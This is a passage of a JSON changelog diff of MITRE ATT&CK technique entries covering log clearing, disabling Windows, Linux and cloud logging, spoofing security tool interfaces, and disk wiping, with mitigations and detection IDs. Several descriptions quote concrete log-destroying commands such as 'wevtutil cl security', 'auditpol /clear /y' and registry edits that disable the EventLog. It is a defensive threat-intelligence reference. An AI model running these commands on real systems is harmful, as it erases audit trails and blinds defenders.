+                            "source_name": "Linux Logs",
+                            "description": "Marcel. (2018, April 19). 12 Critical Linux Log Files You Must be Monitoring. Retrieved March 29, 2020.",
+                            "url": "https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.635000+00:00\", \"old_value\": \"2026-04-22 15:41:39.190000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1029: Remote Data Storage",
+                            "M1041: Encrypt Sensitive Information"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0520: Behavioral Detection of Log File Clearing on Linux and macOS"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--75b9a4d2-d4e2-4ca1-9aab-1badd9e05fd0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-14 22:54:03.796000+00:00",
+                    "modified": "2026-05-12 15:12:00.642000+00:00",
+                    "name": "Clear Windows Event Logs",
+                    "description": "Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.\n\nWith administrator privileges, the event logs can be cleared with the following utility commands:\n\n* `wevtutil cl system`\n* `wevtutil cl application`\n* `wevtutil cl security`\n\nThese logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command `Remove-EventLog -LogName Security` to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)\n\nAdversaries may also attempt to clear logs by directly deleting the stored log files within `C:\\Windows\\System32\\winevt\\logs\\`.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1685/005",
+                            "external_id": "T1685.005"
+                        },
+                        {
+                            "source_name": "disable_win_evt_logging",
+                            "description": "Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.",
+                            "url": "https://ptylu.github.io/content/report/report.html?report=25"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Lucas Heiligenstein"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.642000+00:00\", \"old_value\": \"2026-04-22 15:41:59.512000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1029: Remote Data Storage",
+                            "M1041: Encrypt Sensitive Information"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0532: Detection of Event Log Clearing on Windows via Behavioral Chain"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--34ff60a3-a3f8-42e4-bed0-af9a2cb563d7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-14 22:54:02.368000+00:00",
+                    "modified": "2026-05-12 15:12:00.625000+00:00",
+                    "name": "Disable or Modify Cloud Log",
+                    "description": "An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities. \n\nFor example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity. They may alternatively tamper with logging functionality, for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Cloud Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the Set-MailboxAuditBypassAssociation cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user\u2019s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1685/002",
+                            "external_id": "T1685.002"
+                        },
+                        {
+                            "source_name": "AWS Cloud Trail",
+                            "description": "AWS. (n.d.). update-trail. Retrieved April 15, 2026.",
+                            "url": "https://docs.aws.amazon.com/cli/latest/reference/cloudtrail/update-trail.html"
+                        },
+                        {
+                            "source_name": "Dark Reading",
+                            "description": "Kelly Sheridan. (2021, August 5). Retrieved April 15, 2026.",
+                            "url": "https://www.darkreading.com/threat-intelligence/incident-responders-explore-microsoft-365-attacks-in-the-wild"
+                        },
+                        {
+                            "source_name": "Pacu Detection Disruption Module",
+                            "description": "Rhino Security Labs. (2021, April 29). Pacu Detection Disruption Module. Retrieved August 4, 2023.",
+                            "url": "https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Alex Soler, AttackIQ",
+                        "Arun Seelagan, CISA",
+                        "Ibrahim Ali Khan",
+                        "Janantha Marasinghe",
+                        "Joe Gumke, U.S. Bank",
+                        "Matt Snyder, VMware",
+                        "Prasad Somasamudram, McAfee",
+                        "Sekhar Sarukkai, McAfee",
+                        "Syed Ummar Farooqh, McAfee"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS",
+                        "SaaS",
+                        "Identity Provider",
+                        "Office Suite"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.625000+00:00\", \"old_value\": \"2026-04-22 15:42:27.748000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0289: Detection Strategy for Disable or Modify Cloud Log"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--23d69d00-80c4-42ff-9dac-dbd0459dad75",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-14 22:54:03.325000+00:00",
+                    "modified": "2026-05-12 15:12:00.623000+00:00",
+                    "name": "Disable or Modify Linux Audit System Log",
+                    "description": "Adversaries may disable or modify the Linux Audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules. \n\nOften referred to as `auditd`, this is the name of the daemon used to write events to disk and is governed by the parameters set in the `audit.conf` configuration file. Two primary ways to configure the log generation rules are through the command line `auditctl` utility and the file `/etc/audit/audit.rules`, containing a sequence of `auditctl` commands loaded at boot time.(Citation: IzyKnows auditd threat detection 2022)(Citation: Red Hat Linux Disable or Mod)\n\nWith root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.(Citation: ESET Ebury Feb 2014)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1685/004",
+                            "external_id": "T1685.004"
+                        },
+                        {
+                            "source_name": "IzyKnows auditd threat detection 2022",
+                            "description": "IzySec. (2022, January 26). Linux auditd for Threat Detection. Retrieved September 29, 2023.",
+                            "url": "https://izyknows.medium.com/linux-auditd-for-threat-detection-d06c8b941505"
+                        },
+                        {
+                            "source_name": "ESET Ebury Feb 2014",
+                            "description": "M.L\u00e9veill\u00e9, M.. (2014, February 21). An In-depth Analysis of Linux/Ebury. Retrieved April 19, 2019.",
+                            "url": "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/"
+                        },
+                        {
+                            "source_name": "Red Hat Linux Disable or Mod",
+                            "description": "Red Hat. (n.d.). Retrieved April 15, 2026.",
+                            "url": "https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Tim (Wadhwa-)Brown"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.623000+00:00\", \"old_value\": \"2026-04-22 15:42:49.357000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0062: Detection Strategy for Disable or Modify Linux Audit System Log"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--1411e6b8-80a6-4465-9909-54eaa9c67ce0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-14 22:54:01.982000+00:00",
+                    "modified": "2026-05-12 15:12:00.621000+00:00",
+                    "name": "Disable or Modify Windows Event Log",
+                    "description": "Adversaries may disable or modify the Windows Event Log to limit data that can be leveraged for detections and audits. Windows Event Log records user and system activity such as login attempts and process creation.(Citation: EventLog_Core_Technologies) This data is used by security tools and analysts to generate detections. \n\nThe EventLog service maintains event logs from various system components and applications. By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to `Security Settings\\Local Policies\\Audit Policy` for basic audit policy settings or `Security Settings\\Advanced Audit Policy Configuration` for advanced audit policy settings.(Citation: Microsoft Audit Policy)(Citation: Microsoft Adv Security Settings) `auditpol.exe` may also be used to set audit policies.(Citation: Microsoft auditpol)\n\nAdversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the `Set-Service -Name EventLog -Status Stopped` or `sc config eventlog start=disabled` commands (followed by manually stopping the service using `Stop-Service -Name EventLog`). Additionally, the service may be disabled by modifying the \"Start\" value in `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog` then restarting the system for the change to take effect.(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging)\n\nThere are several ways to disable the EventLog service via registry key modification. Without Administrator privileges, adversaries may modify the \"Start\" value in the key `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Security`, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) With Administrator privilege, adversaries may modify the same values in `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-System` and `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Application` to disable the entire EventLog.\n\nAdditionally, adversaries may use `auditpol` and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the `/success` or `/failure` parameters. For example, `auditpol /set /category:\"Account Logon\" /success:disable /failure:disable` turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC) To clear the audit policy, adversaries may run the following lines: `auditpol /clear /y` or `auditpol /remove /allusers`.(Citation: T1562.002_redcanaryco)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1685/001",
+                            "external_id": "T1685.001"
+                        },
+                        {
+                            "source_name": "Disable_Win_Event_Logging",
+                            "description": " dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved September 10, 2021.",
+                            "url": "https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging"
+                        },
+                        {
+                            "source_name": "EventLog_Core_Technologies",
+                            "description": "Core Technologies. (2021, May 24). Essential Windows Services: EventLog / Windows Event Log. Retrieved September 14, 2021.",
+                            "url": "https://www.coretechnologies.com/blog/windows-services/eventlog/"
+                        },
+                        {
+                            "source_name": "disable_win_evt_logging",
+                            "description": "Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.",
+                            "url": "https://ptylu.github.io/content/report/report.html?report=25"
+                        },
+                        {
+                            "source_name": "Microsoft Audit Policy",
+                            "description": "Microsoft. (n.d.). Retrieved April 15, 2026.",
+                            "url": "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/audit-policy"
+                        },
+                        {
+                            "source_name": "Microsoft Adv Security Settings",
+                            "description": "Microsoft. (n.d.). Retrieved April 15, 2026.",
+                            "url": "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/advanced-security-audit-policy-settings"
+                        },
+                        {
+                            "source_name": "Microsoft auditpol",
+                            "description": "Microsoft. (n.d.). Retrieved April 15, 2026.",
+                            "url": "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol"
+                        },
+                        {
+                            "source_name": "winser19_file_overwrite_bug_twitter",
+                            "description": "Naceri, A. (2021, November 7). Windows Server 2019 file overwrite bug. Retrieved April 7, 2022.",
+                            "url": "https://web.archive.org/web/20211107115646/https://twitter.com/klinix5/status/1457316029114327040"
+                        },
+                        {
+                            "source_name": "T1562.002_redcanaryco",
+                            "description": "redcanaryco. (2021, September 3). T1562.002 - Disable Windows Event Logging. Retrieved September 13, 2021.",
+                            "url": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"
+                        },
+                        {
+                            "source_name": "auditpol.exe_STRONTIC",
+                            "description": "STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021.",
+                            "url": "https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Lucas Heiligenstein",
+                        "Prasanth Sadanala, Cigna Information Protection (CIP) - Threat Response Engineering Team"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.621000+00:00\", \"old_value\": \"2026-04-22 15:43:20.588000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1024: Restrict Registry Permissions",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0187: Detect Disabled Windows Event Log"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--0ff4bd68-aebb-4039-9e00-9f92c705edf4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-14 22:54:02.938000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "Modify or Spoof Tool UI",
+                    "description": "Adversaries may spoof or manipulate security tool user interfaces (UIs) to falsely indicate tools are functioning normally and delay detection and response. \n\nAdversaries may present misleading or falsified security tool interfaces (UIs) that display normal or healthy status indicators, even when underlying security tools have been disabled, degraded, or otherwise tampered with. Security tools typically provide visibility into system health, alerting, and operational status; by misrepresenting this information, adversaries can undermine defender trust in these signals and obscure the true security posture of the system. \n\nThis behavior is often used in conjunction with efforts to disable or modify tools, where adversaries first impair the functionality of defenses (e.g., EDR, logging agents) and then replace or mimic their interfaces to conceal the loss of visibility. By maintaining the appearance of normal operations, such as showing active protection, successful updates, or absence of threats, adversaries can delay investigation and response, enabling continued malicious activity. \n\nFor example, adversaries may display a fake Windows Security interface or system tray icon indicating a \u201cprotected\u201d or \u201chealthy\u201d state after disabling Windows Defender or related services.(Citation: BlackBasta)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1685/003",
+                            "external_id": "T1685.003"
+                        },
+                        {
+                            "source_name": "BlackBasta",
+                            "description": "Antonio Cocomazzi and Antonio Pirozzi. (2022, November 3). Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor. Retrieved March 14, 2023.",
+                            "url": "https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Menachem Goldstein"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2026-04-22 15:44:20.156000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0311: Detection for Spoofing Tool UI across OS Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-20 22:06:41.739000+00:00",
+                    "modified": "2026-05-12 15:12:00.726000+00:00",
+                    "name": "Disk Content Wipe",
+                    "description": "Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have also been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "impact"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1561/001",
+                            "external_id": "T1561.001"
+                        },
+                        {
+                            "source_name": "DOJ Lazarus Sony 2018",
+                            "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.",
+                            "url": "https://www.justice.gov/opa/press-release/file/1092091/download"
+                        },
+                        {
+                            "source_name": "Novetta Blockbuster Destructive Malware",
+                            "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20160303200515/https:/operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf"
+                        },
+                        {
+                            "source_name": "Novetta Blockbuster",
+                            "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.",
+                            "url": "https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf"
+                        },
+                        {
+                            "source_name": "Microsoft Sysmon v6 May 2017",
+                            "description": "Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.",
+                            "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_impact_type": [
+                        "Availability"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.726000+00:00\", \"old_value\": \"2025-10-24 17:49:38.983000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1053: Data Backup"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0316: Detection Strategy for Disk Content Wipe via Direct Access and Overwrite"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-20 22:10:20.484000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "Disk Structure Wipe",
+                    "description": "Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. \n\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.\n\nOn a network devices, adversaries may reformat the file system using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `format`.(Citation: format_cmd_cisco)\n\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "impact"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1561/002",
+                            "external_id": "T1561.002"
+                        },
+                        {
+                            "source_name": "format_cmd_cisco",
+                            "description": "Cisco. (2022, August 16). format - Cisco IOS Configuration Fundamentals Command Reference. Retrieved July 13, 2022.",
+                            "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/F_through_K.html#wp2829794668"
+                        },
+                        {
+                            "source_name": "Unit 42 Shamoon3 2018",
+                            "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.",
+                            "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/"
+                        },
+                        {
+                            "source_name": "Palo Alto Shamoon Nov 2016",
+                            "description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
+                            "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
+                        },
+                        {
+                            "source_name": "FireEye Shamoon Nov 2016",
